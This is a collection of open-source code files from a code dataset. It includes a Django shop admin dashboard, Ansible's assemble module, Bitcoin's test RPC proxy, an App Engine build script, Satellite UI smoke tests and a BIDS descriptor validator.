hydrogens nList.append([1,3]) nList.append([0,2,6]) nList.append([1,5,7]) nList.append([0,4,8]) nList.append([3,5,9]) nList.append([2,4]) nList.append([1]) nList.append([2]) nList.append([3]) nList.append([4]) zList = np.concatenate((np.full(6,6, dtype=int), np.full(4,1, dtype=int))) return nList, zList
mit
jordic/django_tiny_shop
tshop/tadmin/dashboard.py
1
3222
#!/usr/bin/env python # -*- coding: UTF-8 -*- # Autor: jordi collell <jordi@tempointeractiu.cat> # http://tempointeractiu.cat # ------------------------------------------------------------------- ''' ''' """ This file was generated with the customdashboard management command, it contains the two classes for the main dashboard and app index dashboard. You can customize these classes as you want. To activate your index dashboard add the following to your settings.py:: ADMIN_TOOLS_INDEX_DASHBOARD = 'gshop.dashboard.CustomIndexDashboard' And to activate the app index dashboard:: ADMIN_TOOLS_APP_INDEX_DASHBOARD = 'gshop.dashboard.CustomAppIndexDashboard' """ from django.utils.translation import ugettext_lazy as _ from django.core.urlresolvers import reverse from admin_tools.dashboard import modules, Dashboard, \ AppIndexDashboard from admin_tools.utils import get_admin_site_name from order.models import Order import signals class LatestOrders(modules.DashboardModule): title = _(u'Últimos Pedidos') template = 'dashboard/latest_orders.html' def __init__(self, *args, **kwargs): super(LatestOrders, self).__init__(*args, **kwargs) self.objects = Order.objects.all().order_by('-date')[0:10] def is_empty(self): return False class ShopIndexDashboard(Dashboard): """ Custom index dashboard for gshop. """ def init_with_context(self, context): site_name = get_admin_site_name(context) # append a link list module for "quick links" ''' self.children.append(modules.LinkList( _('Quick links'), layout='inline', draggable=False, deletable=False, collapsible=False, children=[ [_('Return to site'), '/'], [_('Change password'), reverse('%s:password_change' % site_name)], [_('Log out'), reverse('%s:logout' % site_name)], ] )) ''' self.children.append(LatestOrders( _(u'Últimos Pedidos'), layout='inline', deletable=False, )) signals.dashboard_index.send(sender=ShopIndexDashboard, dashboard=self) class ShopAppIndexDashboard(AppIndexDashboard): """ Custom app index dashboard for gshop. """ # we disable title because its redundant with the model list module title = '' def __init__(self, *args, **kwargs): AppIndexDashboard.__init__(self, *args, **kwargs) # append a model list module and a recent actions module self.children += [ modules.ModelList(self.app_title, self.models), modules.RecentActions( _('Recent Actions'), include_list=self.get_app_content_types(), limit=5 ) ] signals.app_index_dashboard.send(sender=ShopAppIndexDashboard, dashboard=self) def init_with_context(self, context): """ Use this method if you need to access the request context. """ return super(ShopAppIndexDashboard, self).init_with_context(context)
bsd-3-clause
viru/ansible-modules-core
files/assemble.py
79
8158
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2012, Stephen Fromm <sfromm@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. import os import os.path import shutil import tempfile import re DOCUMENTATION = ''' --- module: assemble short_description: Assembles a configuration file from fragments description: - Assembles a configuration file from fragments. Often a particular program will take a single configuration file and does not support a C(conf.d) style structure where it is easy to build up the configuration from multiple sources. M(assemble) will take a directory of files that can be local or have already been transferred to the system, and concatenate them together to produce a destination file. Files are assembled in string sorting order. Puppet calls this idea I(fragments). version_added: "0.5" options: src: description: - An already existing directory full of source files. required: true default: null aliases: [] dest: description: - A file to create using the concatenation of all of the source files. required: true default: null backup: description: - Create a backup file (if C(yes)), including the timestamp information so you can get the original file back if you somehow clobbered it incorrectly. required: false choices: [ "yes", "no" ] default: "no" delimiter: description: - A delimiter to separate the file contents. version_added: "1.4" required: false default: null remote_src: description: - If False, it will search for src at originating/master machine, if True it will go to the remote/target machine for the src. Default is True. choices: [ "True", "False" ] required: false default: "True" version_added: "1.4" regexp: description: - Assemble files only if C(regex) matches the filename. If not set, all files are assembled. All "\\" (backslash) must be escaped as "\\\\" to comply yaml syntax. Uses Python regular expressions; see U(http://docs.python.org/2/library/re.html). required: false default: null ignore_hidden: description: - A boolean that controls if files that start with a '.' will be included or not. required: false default: false version_added: "2.0" validate: description: - The validation command to run before copying into place. The path to the file to validate is passed in via '%s' which must be present as in the sshd example below. The command is passed securely so shell features like expansion and pipes won't work. required: false default: null version_added: "2.0" author: "Stephen Fromm (@sfromm)" extends_documentation_fragment: - files ''' EXAMPLES = ''' # Example from Ansible Playbooks - assemble: src=/etc/someapp/fragments dest=/etc/someapp/someapp.conf # When a delimiter is specified, it will be inserted in between each fragment - assemble: src=/etc/someapp/fragments dest=/etc/someapp/someapp.conf delimiter='### START FRAGMENT ###' # Copy a new "sshd_config" file into place, after passing validation with sshd - assemble: src=/etc/ssh/conf.d/ dest=/etc/ssh/sshd_config validate='/usr/sbin/sshd -t -f %s' ''' # =========================================== # Support method def assemble_from_fragments(src_path, delimiter=None, compiled_regexp=None, ignore_hidden=False): ''' assemble a file from a directory of fragments ''' tmpfd, temp_path = tempfile.mkstemp() tmp = os.fdopen(tmpfd,'w') delimit_me = False add_newline = False for f in sorted(os.listdir(src_path)): if compiled_regexp and not compiled_regexp.search(f): continue fragment = "%s/%s" % (src_path, f) if not os.path.isfile(fragment) or (ignore_hidden and os.path.basename(fragment).startswith('.')): continue fragment_content = file(fragment).read() # always put a newline between fragments if the previous fragment didn't end with a newline. if add_newline: tmp.write('\n') # delimiters should only appear between fragments if delimit_me: if delimiter: # un-escape anything like newlines delimiter = delimiter.decode('unicode-escape') tmp.write(delimiter) # always make sure there's a newline after the # delimiter, so lines don't run together if delimiter[-1] != '\n': tmp.write('\n') tmp.write(fragment_content) delimit_me = True if fragment_content.endswith('\n'): add_newline = False else: add_newline = True tmp.close() return temp_path # ============================================================== # main def main(): module = AnsibleModule( # not checking because of daisy chain to file module argument_spec = dict( src = dict(required=True), delimiter = dict(required=False), dest = dict(required=True), backup=dict(default=False, type='bool'), remote_src=dict(default=False, type='bool'), regexp = dict(required=False), ignore_hidden = dict(default=False, type='bool'), validate = dict(required=False, type='str'), ), add_file_common_args=True ) changed = False path_md5 = None # Deprecated path_hash = None dest_hash = None src = os.path.expanduser(module.params['src']) dest = os.path.expanduser(module.params['dest']) backup = module.params['backup'] delimiter = module.params['delimiter'] regexp = module.params['regexp'] compiled_regexp = None ignore_hidden = module.params['ignore_hidden'] validate = module.params.get('validate', None) if not os.path.exists(src): module.fail_json(msg="Source (%s) does not exist" % src) if not os.path.isdir(src): module.fail_json(msg="Source (%s) is not a directory" % src) if regexp != None: try: compiled_regexp = re.compile(regexp) except re.error, e: module.fail_json(msg="Invalid Regexp (%s) in \"%s\"" % (e, regexp)) path = assemble_from_fragments(src, delimiter, compiled_regexp, ignore_hidden) path_hash = module.sha1(path) if os.path.exists(dest): dest_hash = module.sha1(dest) if path_hash != dest_hash: if backup and dest_hash is not None: module.backup_local(dest) if validate: if "%s" not in validate: module.fail_json(msg="validate must contain %%s: %s" % validate) (rc, out, err) = module.run_command(validate % path) if rc != 0: module.fail_json(msg="failed to validate: rc:%s error:%s" % (rc, err)) shutil.copy(path, dest) changed = True # Backwards compat. This won't return data if FIPS mode is active try: pathmd5 = module.md5(path) except ValueError: pathmd5 = None os.remove(path) file_args = module.load_file_common_arguments(module.params) changed = module.set_fs_attributes_if_different(file_args, changed) # Mission complete module.exit_json(src=src, dest=dest, md5sum=pathmd5, checksum=path_hash, changed=changed, msg="OK") # import module snippets from ansible.module_utils.basic import * main()
gpl-3.0
CryptArc/bitcoin
test/functional/test_framework/authproxy.py
16
8667
# Copyright (c) 2011 Jeff Garzik # # Previous copyright, from python-jsonrpc/jsonrpc/proxy.py: # # Copyright (c) 2007 Jan-Klaas Kollhof # # This file is part of jsonrpc. # # jsonrpc is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. # # This software is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with this software; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """HTTP proxy for opening RPC connection to bitcoind. AuthServiceProxy has the following improvements over python-jsonrpc's ServiceProxy class: - HTTP connections persist for the life of the AuthServiceProxy object (if server supports HTTP/1.1) - sends protocol 'version', per JSON-RPC 1.1 - sends proper, incrementing 'id' - sends Basic HTTP authentication headers - parses all JSON numbers that look like floats as Decimal - uses standard Python json lib """ import base64 import decimal from http import HTTPStatus import http.client import json import logging import os import socket import time import urllib.parse HTTP_TIMEOUT = 30 USER_AGENT = "AuthServiceProxy/0.1" log = logging.getLogger("BitcoinRPC") class JSONRPCException(Exception): def __init__(self, rpc_error, http_status=None): try: errmsg = '%(message)s (%(code)i)' % rpc_error except (KeyError, TypeError): errmsg = '' super().__init__(errmsg) self.error = rpc_error self.http_status = http_status def EncodeDecimal(o): if isinstance(o, decimal.Decimal): return str(o) raise TypeError(repr(o) + " is not JSON serializable") class AuthServiceProxy(): __id_count = 0 # ensure_ascii: escape unicode as \uXXXX, passed to json.dumps def __init__(self, service_url, service_name=None, timeout=HTTP_TIMEOUT, connection=None, ensure_ascii=True): self.__service_url = service_url self._service_name = service_name self.ensure_ascii = ensure_ascii # can be toggled on the fly by tests self.__url = urllib.parse.urlparse(service_url) user = None if self.__url.username is None else self.__url.username.encode('utf8') passwd = None if self.__url.password is None else self.__url.password.encode('utf8') authpair = user + b':' + passwd self.__auth_header = b'Basic ' + base64.b64encode(authpair) self.timeout = timeout self._set_conn(connection) def __getattr__(self, name): if name.startswith('__') and name.endswith('__'): # Python internal stuff raise AttributeError if self._service_name is not None: name = "%s.%s" % (self._service_name, name) return AuthServiceProxy(self.__service_url, name, connection=self.__conn) def _request(self, method, path, postdata): ''' Do a HTTP request, with retry if we get disconnected (e.g. due to a timeout). This is a workaround for https://bugs.python.org/issue3566 which is fixed in Python 3.5. ''' headers = {'Host': self.__url.hostname, 'User-Agent': USER_AGENT, 'Authorization': self.__auth_header, 'Content-type': 'application/json'} if os.name == 'nt': # Windows somehow does not like to re-use connections # TODO: Find out why the connection would disconnect occasionally and make it reusable on Windows self._set_conn() try: self.__conn.request(method, path, postdata, headers) return self._get_response() except http.client.BadStatusLine as e: if e.line == "''": # if connection was closed, try again self.__conn.close() self.__conn.request(method, path, postdata, headers) return self._get_response() else: raise except (BrokenPipeError, ConnectionResetError): # Python 3.5+ raises BrokenPipeError instead of BadStatusLine when the connection was reset # ConnectionResetError happens on FreeBSD with Python 3.4 self.__conn.close() self.__conn.request(method, path, postdata, headers) return self._get_response() def get_request(self, *args, **argsn): AuthServiceProxy.__id_count += 1 log.debug("-{}-> {} {}".format( AuthServiceProxy.__id_count, self._service_name, json.dumps(args or argsn, default=EncodeDecimal, ensure_ascii=self.ensure_ascii), )) if args and argsn: raise ValueError('Cannot handle both named and positional arguments') return {'version': '1.1', 'method': self._service_name, 'params': args or argsn, 'id': AuthServiceProxy.__id_count} def __call__(self, *args, **argsn): postdata = json.dumps(self.get_request(*args, **argsn), default=EncodeDecimal, ensure_ascii=self.ensure_ascii) response, status = self._request('POST', self.__url.path, postdata.encode('utf-8')) if response['error'] is not None: raise JSONRPCException(response['error'], status) elif 'result' not in response: raise JSONRPCException({ 'code': -343, 'message': 'missing JSON-RPC result'}, status) elif status != HTTPStatus.OK: raise JSONRPCException({ 'code': -342, 'message': 'non-200 HTTP status code but no JSON-RPC error'}, status) else: return response['result'] def batch(self, rpc_call_list): postdata = json.dumps(list(rpc_call_list), default=EncodeDecimal, ensure_ascii=self.ensure_ascii) log.debug("--> " + postdata) response, status = self._request('POST', self.__url.path, postdata.encode('utf-8')) if status != HTTPStatus.OK: raise JSONRPCException({ 'code': -342, 'message': 'non-200 HTTP status code but no JSON-RPC error'}, status) return response def _get_response(self): req_start_time = time.time() try: http_response = self.__conn.getresponse() except socket.timeout: raise JSONRPCException({ 'code': -344, 'message': '%r RPC took longer than %f seconds. Consider ' 'using larger timeout for calls that take ' 'longer to return.' % (self._service_name, self.__conn.timeout)}) if http_response is None: raise JSONRPCException({ 'code': -342, 'message': 'missing HTTP response from server'}) content_type = http_response.getheader('Content-Type') if content_type != 'application/json': raise JSONRPCException( {'code': -342, 'message': 'non-JSON HTTP response with \'%i %s\' from server' % (http_response.status, http_response.reason)}, http_response.status) responsedata = http_response.read().decode('utf8') response = json.loads(responsedata, parse_float=decimal.Decimal) elapsed = time.time() - req_start_time if "error" in response and response["error"] is None: log.debug("<-%s- [%.6f] %s" % (response["id"], elapsed, json.dumps(response["result"], default=EncodeDecimal, ensure_ascii=self.ensure_ascii))) else: log.debug("<-- [%.6f] %s" % (elapsed, responsedata)) return response, http_response.status def __truediv__(self, relative_uri): return AuthServiceProxy("{}/{}".format(self.__service_url, relative_uri), self._service_name, connection=self.__conn) def _set_conn(self, connection=None): port = 80 if self.__url.port is None else self.__url.port if connection: self.__conn = connection self.timeout = connection.timeout elif self.__url.scheme == 'https': self.__conn = http.client.HTTPSConnection(self.__url.hostname, port, timeout=self.timeout) else: self.__conn = http.client.HTTPConnection(self.__url.hostname, port, timeout=self.timeout)
mit
smadhusu/AppRTC
build/build_app_engine_package.py
21
3488
#!/usr/bin/python """Build App Engine source package. """ import json import optparse import os import shutil import subprocess import sys import test_file_herder USAGE = """%prog src_path dest_path Build the GAE source code package. src_path Path to the source code root directory. dest_path Path to the root directory to push/deploy GAE from.""" def call_cmd_and_return_output_lines(cmd): try: process = subprocess.Popen(cmd, stdout=subprocess.PIPE) output = process.communicate()[0] return output.split('\n') except OSError as e: print str(e) return [] def build_version_info_file(dest_path): """Build the version info JSON file.""" version_info = { 'gitHash': None, 'time': None, 'branch': None } lines = call_cmd_and_return_output_lines(['git', 'log', '-1']) for line in lines: if line.startswith('commit'): version_info['gitHash'] = line.partition(' ')[2].strip() elif line.startswith('Date'): version_info['time'] = line.partition(':')[2].strip() if version_info['gitHash'] is not None and version_info['time'] is not None: break lines = call_cmd_and_return_output_lines(['git', 'branch']) for line in lines: if line.startswith('*'): version_info['branch'] = line.partition(' ')[2].strip() break try: with open(dest_path, 'w') as f: f.write(json.dumps(version_info)) except IOError as e: print str(e) def CopyApprtcSource(src_path, dest_path): if os.path.exists(dest_path): shutil.rmtree(dest_path) os.makedirs(dest_path) simply_copy_subdirs = ['bigquery', 'css', 'images', 'third_party'] for dirpath, unused_dirnames, files in os.walk(src_path): for subdir in simply_copy_subdirs: if dirpath.endswith(subdir): shutil.copytree(dirpath, os.path.join(dest_path, subdir)) if dirpath.endswith('html'): dest_html_path = os.path.join(dest_path, 'html') os.makedirs(dest_html_path) for name in files: # Template files must be in the root directory. if name.endswith('_template.html'): shutil.copy(os.path.join(dirpath, name), dest_path) else: shutil.copy(os.path.join(dirpath, name), dest_html_path) elif dirpath.endswith('app_engine'): for name in files: if (name.endswith('.py') and 'test' not in name or name.endswith('.yaml')): shutil.copy(os.path.join(dirpath, name), dest_path) elif dirpath.endswith('js'): for name in files: # loopback.js is not compiled by Closure and needs to be copied # separately. if name == 'loopback.js': dest_js_path = os.path.join(dest_path, 'js') os.makedirs(dest_js_path) shutil.copy(os.path.join(dirpath, name), dest_js_path) break build_version_info_file(os.path.join(dest_path, 'version_info.json')) def main(): parser = optparse.OptionParser(USAGE) parser.add_option("-t", "--include-tests", action="store_true", help='Also copy python tests to the out dir.') options, args = parser.parse_args() if len(args) != 2: parser.error('Error: Exactly 2 arguments required.') src_path, dest_path = args[0:2] CopyApprtcSource(src_path, dest_path) if options.include_tests: app_engine_code = os.path.join(src_path, 'app_engine') test_file_herder.CopyTests(os.path.join(src_path, 'app_engine'), dest_path) if __name__ == '__main__': sys.exit(main())
bsd-3-clause
blrm/robottelo
tests/foreman/smoke/test_ui_smoke.py
2
19258
"""Smoke tests for the ``UI`` end-to-end scenario.""" from fauxfactory import gen_string, gen_ipaddr from robottelo import manifests from robottelo.config import settings from robottelo.constants import ( ANY_CONTEXT, DEFAULT_LOC, DEFAULT_ORG, DEFAULT_SUBSCRIPTION_NAME, DOMAIN, FAKE_0_PUPPET_REPO, FOREMAN_PROVIDERS, GOOGLE_CHROME_REPO, LIBVIRT_RESOURCE_URL, PRDS, REPOS, REPOSET, REPO_TYPE, RHVA_REPO_TREE, SAT6_TOOLS_TREE, FAKE_6_PUPPET_REPO, ) from robottelo.decorators import bz_bug_is_open, skip_if_not_set from robottelo.test import UITestCase from robottelo.ui.factory import ( make_activationkey, make_contentview, make_domain, make_hostgroup, make_lifecycle_environment, make_org, make_product, make_repository, make_resource, make_subnet, make_user, set_context, ) from robottelo.ui.locators import common_locators from robottelo.ui.session import Session from robottelo.vm import VirtualMachine class SmokeTestCase(UITestCase): """End-to-end tests using the ``WebUI``.""" def test_positive_find_default_org(self): """@Test: Check if :data:`robottelo.constants.DEFAULT_ORG` is present @Feature: Smoke Test @Assert: 'Default Organization' is found """ with Session(self.browser) as session: self.assertEqual( session.nav.go_to_select_org(DEFAULT_ORG), DEFAULT_ORG ) def test_positive_find_default_loc(self): """@Test: Check if :data:`robottelo.constants.DEFAULT_LOC` is present @Feature: Smoke Test @Assert: 'Default Location' is found """ with Session(self.browser) as session: self.assertEqual( session.nav.go_to_select_loc(DEFAULT_LOC), DEFAULT_LOC ) def test_positive_find_admin_user(self): """Check if Admin User is present @Feature: Smoke Test @Assert: Admin User is found and has Admin role """ with Session(self.browser): self.assertTrue(self.user.user_admin_role_toggle('admin')) def test_positive_smoke(self): """Check that basic content can be created * Create a new user with admin permissions * Using the new user from above: * Create a new organization * Create two new lifecycle environments * Create a custom product * Create a custom YUM repository * Create a custom PUPPET repository * Synchronize both custom repositories * Create a new content view * Associate both repositories to new content view * Publish content view * Promote content view to both lifecycles * Create a new libvirt compute resource * Create a new subnet * Create a new domain * Create a new hostgroup and associate previous entities to it @Feature: Smoke Test @Assert: All entities are created and associated. """ user_name = gen_string('alpha') password = gen_string('alpha') org_name = gen_string('alpha') env_1_name = gen_string('alpha') env_2_name = gen_string('alpha') product_name = gen_string('alpha') yum_repository_name = gen_string('alpha') puppet_repository_name = gen_string('alpha') cv_name = gen_string('alpha') compute_resource_name = gen_string('alpha') subnet_name = gen_string('alpha') domain_name = gen_string('alpha') domain = DOMAIN % domain_name hostgroup_name = gen_string('alpha') # Create new user with admin permissions with Session(self.browser) as session: make_user( session, username=user_name, password1=password, password2=password ) self.assertIsNotNone(self.user.search(user_name)) self.assertTrue(self.user.user_admin_role_toggle(user_name)) # FIX ME: UI doesn't authenticate user created via UI auto: Issue #1152 # Once #1152 is fixed; need to pass user_name and password to Session with Session(self.browser) as session: # Create New organization make_org(session, org_name=org_name) self.assertIsNotNone(self.org.search(org_name)) # Create New Lifecycle environment1 make_lifecycle_environment(session, org=org_name, name=env_1_name) self.assertIsNotNone(self.lifecycleenvironment.search(env_1_name)) # Create New Lifecycle environment2 make_lifecycle_environment( session, org=org_name, name=env_2_name, prior=env_1_name ) self.assertIsNotNone(self.lifecycleenvironment.search(env_2_name)) # Create custom product make_product(session, org=org_name, name=product_name) product = self.products.search(product_name) self.assertIsNotNone(product) # Create a YUM repository product.click() make_repository( session, name=yum_repository_name, url=GOOGLE_CHROME_REPO ) self.assertIsNotNone(self.repository.search(yum_repository_name)) # Create a puppet Repository self.products.search(product_name).click() make_repository( session, name=puppet_repository_name, url=FAKE_0_PUPPET_REPO, repo_type=REPO_TYPE['puppet'] ) self.assertIsNotNone(self.repository.search( puppet_repository_name )) # Sync YUM and puppet repository self.navigator.go_to_sync_status() self.assertIsNotNone(self.sync.sync_custom_repos( product_name, [yum_repository_name, puppet_repository_name] )) # Create new content-view make_contentview(session, org=org_name, name=cv_name) self.assertIsNotNone(self.content_views.search(cv_name)) # Add YUM repository to content-view self.content_views.add_remove_repos(cv_name, [yum_repository_name]) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Add puppet-module to content-view if not bz_bug_is_open(1297308): self.content_views.add_puppet_module( cv_name, 'httpd', filter_term='Latest' ) # Publish content-view self.content_views.publish(cv_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment 1 self.content_views.promote( cv_name, version='Version 1', env=env_1_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment 2 self.content_views.promote( cv_name, version='Version 1', env=env_2_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Create a new libvirt compute resource url = ( LIBVIRT_RESOURCE_URL % settings.server.hostname ) make_resource( session, org=org_name, name=compute_resource_name, provider_type=FOREMAN_PROVIDERS['libvirt'], parameter_list=[['URL', url, 'field']], ) self.assertIsNotNone( self.compute_resource.search(compute_resource_name)) # Create a subnet make_subnet( session, org=org_name, subnet_name=subnet_name, subnet_network=gen_ipaddr(ip3=True), subnet_mask='255.255.255.0' ) self.assertIsNotNone(self.subnet.search(subnet_name)) # Create a Domain make_domain( session, org=org_name, name=domain, description=domain ) self.assertIsNotNone(self.domain.search(domain)) # Create a HostGroup make_hostgroup(session, name=hostgroup_name) self.assertIsNotNone(self.hostgroup.search(hostgroup_name)) @skip_if_not_set('clients') def test_positive_end_to_end(self): """Perform end to end smoke tests using RH repos. @Feature: Smoke test @Assert: All tests should succeed and Content should be successfully fetched by client """ org_name = gen_string('alpha', 6) cv_name = gen_string('alpha', 6) activation_key_name = gen_string('alpha', 6) env_name = gen_string('alpha', 6) repos = self.sync.create_repos_tree(RHVA_REPO_TREE) with Session(self.browser) as session: # Create New organization make_org(session, org_name=org_name) self.assertIsNotNone(self.org.search(org_name)) # Create New Lifecycle environment make_lifecycle_environment(session, org=org_name, name=env_name) self.assertIsNotNone(self.lifecycleenvironment.search(env_name)) # Navigate UI to select org and redhat subscription page session.nav.go_to_select_org(org_name) session.nav.go_to_red_hat_subscriptions() # Upload manifest from webui with manifests.clone() as manifest: self.subscriptions.upload(manifest) self.assertTrue(session.nav.wait_until_element( common_locators['alert.success'] )) session.nav.go_to_red_hat_repositories() # List of dictionary passed to enable the redhat repos # It selects Product->Reposet-> Repo self.sync.enable_rh_repos(repos) session.nav.go_to_sync_status() # Sync the repos # syn.sync_rh_repos returns boolean values and not objects self.assertTrue(self.sync.sync_rh_repos(repos)) # Create new content-view make_contentview(session, org=org_name, name=cv_name) self.assertIsNotNone(self.content_views.search(cv_name)) # Add YUM repository to content-view self.content_views.add_remove_repos( cv_name, [REPOS['rhva65']['name'], REPOS['rhva6']['name']] ) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Publish content-view self.content_views.publish(cv_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment 1 self.content_views.promote( cv_name, version='Version 1', env=env_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Create Activation-Key make_activationkey( session, org=org_name, name=activation_key_name, env=env_name, content_view=cv_name ) self.activationkey.associate_product( activation_key_name, [DEFAULT_SUBSCRIPTION_NAME]) self.activationkey.enable_repos( activation_key_name, [REPOSET['rhva6']]) if not bz_bug_is_open(1191541): self.assertIsNotNone(self.activationkey.wait_until_element( common_locators['alert.success'] )) # Create VM with VirtualMachine(distro='rhel66') as vm: vm.install_katello_ca() result = vm.register_contenthost(activation_key_name, org_name) self.assertEqual(result.return_code, 0) # Install contents from sat6 server package_name = 'python-kitchen' result = vm.run(u'yum install -y {0}'.format(package_name)) self.assertEqual(result.return_code, 0) # Verify if package is installed by query it result = vm.run(u'rpm -q {0}'.format(package_name)) self.assertEqual(result.return_code, 0) @skip_if_not_set('clients') def test_positive_puppet_install(self): """Perform puppet end to end smoke tests using RH repos. @Feature: Smoke test puppet install and configure on client @Assert: Client should get configured by puppet-module. """ activation_key_name = gen_string('alpha') cv_name = gen_string('alpha') env_name = gen_string('alpha') org_name = gen_string('alpha') product_name = gen_string('alpha') puppet_module = 'motd' puppet_repository_name = gen_string('alpha') repos = self.sync.create_repos_tree(SAT6_TOOLS_TREE) rhel_prd = DEFAULT_SUBSCRIPTION_NAME rhel6_repo = settings.rhel6_repo with Session(self.browser) as session: # Create New organization make_org(session, org_name=org_name) self.assertIsNotNone(self.org.search(org_name)) # Create New Lifecycle environment make_lifecycle_environment(session, org=org_name, name=env_name) self.assertIsNotNone(self.lifecycleenvironment.search(env_name)) session.nav.go_to_red_hat_subscriptions() # Upload manifest from webui with manifests.clone() as manifest: self.subscriptions.upload(manifest) self.assertTrue(session.nav.wait_until_element( common_locators['alert.success'] )) session.nav.go_to_red_hat_repositories() # List of dictionary passed to enable the redhat repos # It selects Product->Reposet-> Repo self.sync.enable_rh_repos(repos) session.nav.go_to_sync_status() # Sync the repos # syn.sync_rh_repos returns boolean values and not objects self.assertTrue(self.sync.sync_noversion_rh_repos( PRDS['rhel'], [REPOS['rhst6']['name']] )) # Create custom product make_product(session, org=org_name, name=product_name) product = self.products.search(product_name) self.assertIsNotNone(product) # Create a puppet Repository product.click() make_repository( session, name=puppet_repository_name, url=FAKE_6_PUPPET_REPO, repo_type=REPO_TYPE['puppet'] ) self.assertIsNotNone(self.repository.search( puppet_repository_name )) # Sync the repos # syn.sync_rh_repos returns boolean values and not objects session.nav.go_to_sync_status() self.assertIsNotNone(self.sync.sync_custom_repos( product_name, [puppet_repository_name] )) # Create new content-view make_contentview(session, org=org_name, name=cv_name) self.assertIsNotNone(self.content_views.search(cv_name)) # Add YUM repository to content-view self.content_views.add_remove_repos( cv_name, [REPOS['rhst6']['name']], ) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Add puppet-module to content-view self.content_views.add_puppet_module( cv_name, puppet_module, filter_term='Latest') # Publish content-view self.content_views.publish(cv_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment. self.content_views.promote( cv_name, version='Version 1', env=env_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Create Activation-Key make_activationkey( session, org=org_name, name=activation_key_name, env=env_name, content_view=cv_name ) self.activationkey.associate_product( activation_key_name, [product_name, rhel_prd]) self.activationkey.enable_repos( activation_key_name, [REPOSET['rhst6']] ) if not bz_bug_is_open(1191541): self.assertIsNotNone(self.activationkey.wait_until_element( common_locators['alert.success'] )) # Create VM with VirtualMachine(distro='rhel67') as vm: vm.install_katello_ca() vm.register_contenthost(activation_key_name, org_name) vm.configure_puppet(rhel6_repo) host = vm.hostname set_context(session, org=ANY_CONTEXT['org']) session.nav.go_to_hosts() self.hosts.update_host_bulkactions(host=host, org=org_name) self.hosts.update( name=host, lifecycle_env=env_name, cv=cv_name, reset_puppetenv=True, ) session.nav.go_to_hosts() self.hosts.update( name=host, reset_puppetenv=False, puppet_module=puppet_module ) vm.run(u'puppet agent -t') result = vm.run(u'cat /etc/motd | grep FQDN') self.assertEqual(result.return_code, 0)
gpl-3.0
boutiques/schema
tools/python/boutiques/bids.py
2
2608
#!/usr/bin/env python import re import simplejson import os.path as op from boutiques.validator import DescriptorValidationError from boutiques.logger import raise_error, print_info # BIDS validation module def validate_bids(descriptor, valid=False): if not valid: msg = "Please provide a Boutiques descriptor that has been validated." raise_error(DescriptorValidationError, msg) errors = [] # TODO: verify not only that all fields/keys exist, their properties, too # Ensure the command-line conforms to the BIDS app spec msg_template = " CLIError: command-line doesn't match template: {}" cltemp = r"mkdir -p \[OUTPUT_DIR\]; (.*) \[BIDS_DIR\] \[OUTPUT_DIR\]"\ r" \[ANALYSIS_LEVEL\] \[PARTICIPANT_LABEL\] \[SESSION_LABEL\]"\ r"[\\s]*(.*)" cmdline = descriptor["command-line"] if len(re.findall(cltemp, cmdline)) < 1: errors += [msg_template.format(cltemp)] # Verify IDs are present which link to the OUTPUT_DIR # key bot as File and String ftypes = set(["File", "String"]) msg_template = " OutError: \"{}\" types for outdir do not match \"{}\"" outtypes = set([inp["type"] for inp in descriptor["inputs"] if inp["value-key"] == "[OUTPUT_DIR]"]) if outtypes != ftypes: errors += [msg_template.format(", ".join(outtypes), ", ".join(ftypes))] # Verify that analysis levels is an enumerable with some # subset of "paricipant", "session", and "group" choices = ["session", "participant", "group"] msg_template = " LevelError: \"{}\" is not a valid analysis level" alevels = [inp["value-choices"] for inp in descriptor["inputs"] if inp["value-key"] == "[ANALYSIS_LEVEL]"][0] errors += [msg_template.format(lv) for lv in alevels if lv not in choices] # Verify there is only a single output defined (the directory) msg_template = "OutputError: 0 or multiple outputs defined" if len(descriptor["output-files"]) != 1: errors += [msg_template] else: # Verify that the output shows up as an output msg_template = "OutputError: OUTPUT_DIR is not represented as an output" if descriptor["output-files"][0]["path-template"] != "[OUTPUT_DIR]": errors += [msg_template] errors = None if errors == [] else errors if errors is None: print_info("BIDS validation OK") else: raise_error(DescriptorValidationError, "Invalid BIDS app descriptor:" "\n"+"\n".join(errors))
gpl-2.0
jendap/tensorflow
tensorflow/contrib/distributions/python/kernel_tests/vector_sinh_arcsinh_diag_test.py
25
10036
